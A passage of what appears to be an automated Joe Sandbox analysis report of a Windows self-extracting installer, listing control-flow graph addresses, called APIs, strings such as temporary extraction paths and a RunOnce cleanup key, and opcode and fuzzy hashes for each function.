7ff7d2a612ec 386->387 387->379 390 7ff7d2a63075-7ff7d2a630a1 call 7ff7d2a67ac8 387->390 390->345 393 7ff7d2a630a3 390->393 393->379
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                                                                                                                          • String ID: $Adv$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                                                                                                                          • API String ID: 3100096412-78895606
                                                                                                                                                                                          • Opcode ID: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                                                                                                                                          • Instruction ID: 6178dafd1aa92c5e9ae20c8bc4874216c9aabdf093b9fe1ce48383ff7d23be8a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB815961E0CE4386F728BB51A804BBDB690EBD4786FC14037DD4D42695CFBDA50BCA28

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 394 7ff7d2a66ca4-7ff7d2a66d10 GetCurrentDirectoryA SetCurrentDirectoryA 395 7ff7d2a66d3f-7ff7d2a66d7a GetDiskFreeSpaceA 394->395 396 7ff7d2a66d12-7ff7d2a66d3a call 7ff7d2a64dcc call 7ff7d2a67700 394->396 398 7ff7d2a66f63-7ff7d2a66fb8 memset call 7ff7d2a67700 GetLastError FormatMessageA 395->398 399 7ff7d2a66d80-7ff7d2a66da8 MulDiv 395->399 415 7ff7d2a66fe9 396->415 407 7ff7d2a66fbd-7ff7d2a66fe4 call 7ff7d2a64dcc SetCurrentDirectoryA 398->407 399->398 400 7ff7d2a66dae-7ff7d2a66de4 GetVolumeInformationA 399->400 403 7ff7d2a66de6-7ff7d2a66e40 memset call 7ff7d2a67700 GetLastError FormatMessageA 400->403 404 7ff7d2a66e45-7ff7d2a66e68 SetCurrentDirectoryA 400->404 403->407 409 7ff7d2a66e6c-7ff7d2a66e73 404->409 407->415 413 7ff7d2a66e86-7ff7d2a66e99 409->413 414 7ff7d2a66e75-7ff7d2a66e7a 409->414 419 7ff7d2a66e9d-7ff7d2a66ea0 413->419 414->413 418 7ff7d2a66e7c-7ff7d2a66e84 414->418 417 7ff7d2a66feb-7ff7d2a6701a call 7ff7d2a68470 415->417 418->409 418->413 421 7ff7d2a66eae-7ff7d2a66eb2 419->421 422 7ff7d2a66ea2-7ff7d2a66eac 419->422 424 7ff7d2a66ed8-7ff7d2a66edf 421->424 425 7ff7d2a66eb4-7ff7d2a66ed3 call 7ff7d2a64dcc 421->425 422->419 422->421 426 7ff7d2a66f0e-7ff7d2a66f1f 424->426 427 7ff7d2a66ee1-7ff7d2a66ee9 424->427 425->415 430 7ff7d2a66f22-7ff7d2a66f2a 426->430 427->426 429 7ff7d2a66eeb-7ff7d2a66f0c 427->429 429->430 432 7ff7d2a66f2c-7ff7d2a66f30 430->432 433 7ff7d2a66f46-7ff7d2a66f49 430->433 434 7ff7d2a66f32 432->434 435 7ff7d2a66f4b-7ff7d2a66f4d 433->435 436 7ff7d2a66f4f-7ff7d2a66f52 433->436 437 7ff7d2a66f54-7ff7d2a66f5e 434->437 438 7ff7d2a66f34-7ff7d2a66f41 call 7ff7d2a624f8 434->438 435->434 436->434 437->417 438->417
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                          • API String ID: 4237285672-4293232008
                                                                                                                                                                                          • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                                                                                          • Instruction ID: 2ef580e7b20577ac5dbd12d14dabd3f4fe8e3b648561344828ce81c1fcc3a76b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 09A16036A18A428AE724AF21E440AAEFBA5FBC9B45FC44136DE4D43B54CF7DD406CB14

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                          • String ID: *MEMCAB$CABINET
                                                                                                                                                                                          • API String ID: 1305606123-2642027498
                                                                                                                                                                                          • Opcode ID: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                                                                                                                                          • Instruction ID: 67dd84e0724e8b1e4961b86aaee695bbf2288c11a279977a559e092977fa8cdd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1751F831A08F4386EB58AB10A454A7DA7A1FBC9746FC44137DD4D02A64DFBDD006C668

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 525 7ff7d2a630ec-7ff7d2a63114 526 7ff7d2a63116-7ff7d2a6311c 525->526 527 7ff7d2a63141-7ff7d2a63148 call 7ff7d2a65fe4 525->527 528 7ff7d2a6311e call 7ff7d2a660a4 526->528 529 7ff7d2a63134-7ff7d2a6313b call 7ff7d2a63f74 526->529 534 7ff7d2a6314e-7ff7d2a63155 call 7ff7d2a666c4 527->534 535 7ff7d2a63236 527->535 536 7ff7d2a63123-7ff7d2a63125 528->536 529->527 529->535 534->535 543 7ff7d2a6315b-7ff7d2a6319d GetSystemDirectoryA call 7ff7d2a67ba8 LoadLibraryA 534->543 539 7ff7d2a63238-7ff7d2a63258 call 7ff7d2a68470 535->539 536->535 540 7ff7d2a6312b-7ff7d2a63132 536->540 540->527 540->529 547 7ff7d2a631c9-7ff7d2a631de FreeLibrary 543->547 548 7ff7d2a6319f-7ff7d2a631b8 GetProcAddress 543->548 550 7ff7d2a631e4-7ff7d2a631ea 547->550 551 7ff7d2a63273-7ff7d2a63288 SetCurrentDirectoryA 547->551 548->547 549 7ff7d2a631ba-7ff7d2a631c3 DecryptFileA 548->549 549->547 550->551 554 7ff7d2a631f0-7ff7d2a6320b GetWindowsDirectoryA 550->554 552 7ff7d2a6328a-7ff7d2a6328f 551->552 553 7ff7d2a63291-7ff7d2a63297 551->553 555 7ff7d2a63212-7ff7d2a63230 call 7ff7d2a64dcc call 7ff7d2a67700 552->555 556 7ff7d2a6332d-7ff7d2a63335 553->556 557 7ff7d2a6329d-7ff7d2a632a4 553->557 558 7ff7d2a6320d 554->558 559 7ff7d2a6325a-7ff7d2a6326a call 7ff7d2a66ca4 554->559 555->535 561 7ff7d2a63337-7ff7d2a63339 556->561 562 7ff7d2a63349 556->562 563 7ff7d2a632a9-7ff7d2a632b7 557->563 558->555 566 7ff7d2a6326f-7ff7d2a63271 559->566 561->562 567 7ff7d2a6333b-7ff7d2a63342 call 7ff7d2a62318 561->567 565 7ff7d2a6334b-7ff7d2a63359 562->565 563->563 568 7ff7d2a632b9-7ff7d2a632c0 563->568 570 7ff7d2a6335b-7ff7d2a63361 565->570 571 7ff7d2a63376-7ff7d2a6337d 565->571 566->535 566->551 581 7ff7d2a63347 567->581 573 7ff7d2a632fb call 7ff7d2a65d90 568->573 574 7ff7d2a632c2-7ff7d2a632c9 568->574 570->571 577 7ff7d2a63363 call 7ff7d2a640c4 570->577 579 7ff7d2a63388-7ff7d2a6338d 571->579 580 7ff7d2a6337f-7ff7d2a63381 571->580 585 7ff7d2a63300 573->585 574->573 582 7ff7d2a632cb-7ff7d2a632f1 call 7ff7d2a67ac8 574->582 588 7ff7d2a63368-7ff7d2a6336a 577->588 579->539 580->579 586 7ff7d2a63383 call 7ff7d2a6494c 580->586 581->565 587 7ff7d2a632f6-7ff7d2a632f9 582->587 589 7ff7d2a63302 585->589 586->579 587->589 588->535 591 7ff7d2a63370 588->591 592 7ff7d2a63304-7ff7d2a6330e 589->592 593 7ff7d2a63313-7ff7d2a63321 call 7ff7d2a6772c 589->593 591->571 592->535 593->535 596 7ff7d2a63327 593->596 596->556
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                          • API String ID: 3010855178-2620542255
                                                                                                                                                                                          • Opcode ID: cffcf8a3b76aee679a097a9499c7360123ef4f246d294c3f42600086d58a5e88
                                                                                                                                                                                          • Instruction ID: 6ba9a94eba9e407dc2e1c03e52153e33ebbecf13b9ad8dc1365ead09a7474a44
                                                                                                                                                                                          • Opcode Fuzzy Hash: cffcf8a3b76aee679a097a9499c7360123ef4f246d294c3f42600086d58a5e88
                                                                                                                                                                                          • Instruction Fuzzy Hash: 26712A20A0CE8386FB68BB21A944A7DE695EFD4B82FC54077DD4D42191DFACE447C628

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 597 7ff7d2a664e4-7ff7d2a66510 598 7ff7d2a66516-7ff7d2a6651b call 7ff7d2a663b8 597->598 599 7ff7d2a665df-7ff7d2a665ee 597->599 604 7ff7d2a66520-7ff7d2a66522 598->604 600 7ff7d2a665f1-7ff7d2a665fb 599->600 602 7ff7d2a665fd-7ff7d2a66603 600->602 603 7ff7d2a66610-7ff7d2a6661b 600->603 602->603 607 7ff7d2a66605-7ff7d2a6660e 602->607 608 7ff7d2a6661e-7ff7d2a66628 call 7ff7d2a66b70 603->608 605 7ff7d2a66688-7ff7d2a6668a 604->605 606 7ff7d2a66528-7ff7d2a6653e 604->606 610 7ff7d2a66698-7ff7d2a666bc call 7ff7d2a68470 605->610 609 7ff7d2a66541-7ff7d2a6654b 606->609 607->600 607->603 620 7ff7d2a6662a-7ff7d2a6663d CreateDirectoryA 608->620 621 7ff7d2a66649-7ff7d2a6664b 608->621 612 7ff7d2a6654d-7ff7d2a66553 609->612 613 7ff7d2a66560-7ff7d2a66575 609->613 612->613 616 7ff7d2a66555-7ff7d2a6655e 612->616 617 7ff7d2a665cc-7ff7d2a665dd call 7ff7d2a67ba8 613->617 618 7ff7d2a66577-7ff7d2a6658f GetSystemInfo 613->618 616->609 616->613 617->608 623 7ff7d2a665bb 618->623 624 7ff7d2a66591-7ff7d2a66594 618->624 625 7ff7d2a6667d-7ff7d2a66682 call 7ff7d2a67700 620->625 626 7ff7d2a6663f 620->626 627 7ff7d2a6668c-7ff7d2a66693 621->627 628 7ff7d2a6664d-7ff7d2a66655 call 7ff7d2a66ca4 621->628 633 7ff7d2a665c2-7ff7d2a665c7 call 7ff7d2a67ba8 623->633 631 7ff7d2a66596-7ff7d2a66599 624->631 632 7ff7d2a665b2-7ff7d2a665b9 624->632 625->605 626->621 627->610 639 7ff7d2a6665a-7ff7d2a6665c 628->639 636 7ff7d2a6659b-7ff7d2a6659e 631->636 637 7ff7d2a665a9-7ff7d2a665b0 631->637 632->633 633->617 636->617 641 7ff7d2a665a0-7ff7d2a665a7 636->641 637->633 639->627 640 7ff7d2a6665e-7ff7d2a66664 639->640 640->605 642 7ff7d2a66666-7ff7d2a6667b RemoveDirectoryA 640->642 641->633 642->605
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7D2A62CE1), ref: 00007FF7D2A6657C
                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7D2A62CE1), ref: 00007FF7D2A6662F
                                                                                                                                                                                          • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7D2A62CE1), ref: 00007FF7D2A6666F
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A663B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF7D2A62CE1), ref: 00007FF7D2A66423
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A663B8: GetFileAttributesA.KERNELBASE ref: 00007FF7D2A66432
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A663B8: GetTempFileNameA.KERNEL32 ref: 00007FF7D2A6645B
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A663B8: DeleteFileA.KERNEL32 ref: 00007FF7D2A66473
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A663B8: CreateDirectoryA.KERNEL32 ref: 00007FF7D2A66484
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                          • API String ID: 1979080616-1478429178
                                                                                                                                                                                          • Opcode ID: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
                                                                                                                                                                                          • Instruction ID: 31d004cc3e58c4639c80d66dce19c01ae643718179dea1fc4d9f91094e13460d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B517361A0DE4281FB1DAF15A810ABDE790EFC4B42FD84137CD0E42695DFADE406C264

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                                                                                                                          • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                                                                                                                          • API String ID: 1302179841-1204263913
                                                                                                                                                                                          • Opcode ID: daf853eb771a12f59abebe1272519bf3fa6e24b0f3f778556f2b7b241e27ec3d
                                                                                                                                                                                          • Instruction ID: b3942833d5097e24285e74d1ebb13e6c9c411e28c6d8f4439ae50c4ceddbd300
                                                                                                                                                                                          • Opcode Fuzzy Hash: daf853eb771a12f59abebe1272519bf3fa6e24b0f3f778556f2b7b241e27ec3d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E312C21E08F4386FB69BB60A440A7DE691EFD5B82FC44137CE0D02695CFBDA446C628
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 836429354-0
                                                                                                                                                                                          • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                                                                                                          • Instruction ID: 9dbe358b0e344734dfc135129d7b51cde8038adb7c6f199f013bab1070c5b080
                                                                                                                                                                                          • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                                                                                                          • Instruction Fuzzy Hash: F3517C7160CE8295EB15AF20D8546ECBBA1FB85B86FC48172DE5E03694DFBCD50AC314
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1214682469-0
                                                                                                                                                                                          • Opcode ID: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                                                                                                                          • Instruction ID: 90260267090d8ba9c80db84f1406176dd677bde2e505848d2381802319a50fcb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                                                                                                                          • Instruction Fuzzy Hash: B9114F31A18F4286EB149B12A844669FA60FB89FE2FC84635DF5E07B94DF7CD441CA18

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                                                                                                                          • String ID: $Adv
                                                                                                                                                                                          • API String ID: 2654313074-3776740653
                                                                                                                                                                                          • Opcode ID: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                                                                                                                          • Instruction ID: 5a397d01af5aad2253400fdb6fb1c08aead7cf607fffdfdf1ac1289424022107
                                                                                                                                                                                          • Opcode Fuzzy Hash: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2513231908E4386E7187B11A944A7DEA61EBC9B56FC59237CE1D03B94CFBC9447C728

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                          • API String ID: 3049360512-2692272486
                                                                                                                                                                                          • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                                                                                                                                          • Instruction ID: 1f6798be5cfdc6119402bc705a2261961d3021a490e1ce2ee98bd5a986330171
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B513131A18E82C6EB14AB10E454BBDF761FBC5B46FC84072CD5D06694CFACE40AC724

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3183975587-3916222277
                                                                                                                                                                                          • Opcode ID: 0612355d7098dd9214d3ec5057fb5c6aaccd7f37b0a93b2f13a3672e5b451275
                                                                                                                                                                                          • Instruction ID: e7cbef6b6018299298771c42d82653effaf9cbb1f90710b8dafe8f29f520944f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0612355d7098dd9214d3ec5057fb5c6aaccd7f37b0a93b2f13a3672e5b451275
                                                                                                                                                                                          • Instruction Fuzzy Hash: F3514032908E8286E764AB50E454B7DF7A0FBC8796FC44136DE4D466A4CFBCD446CB28

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
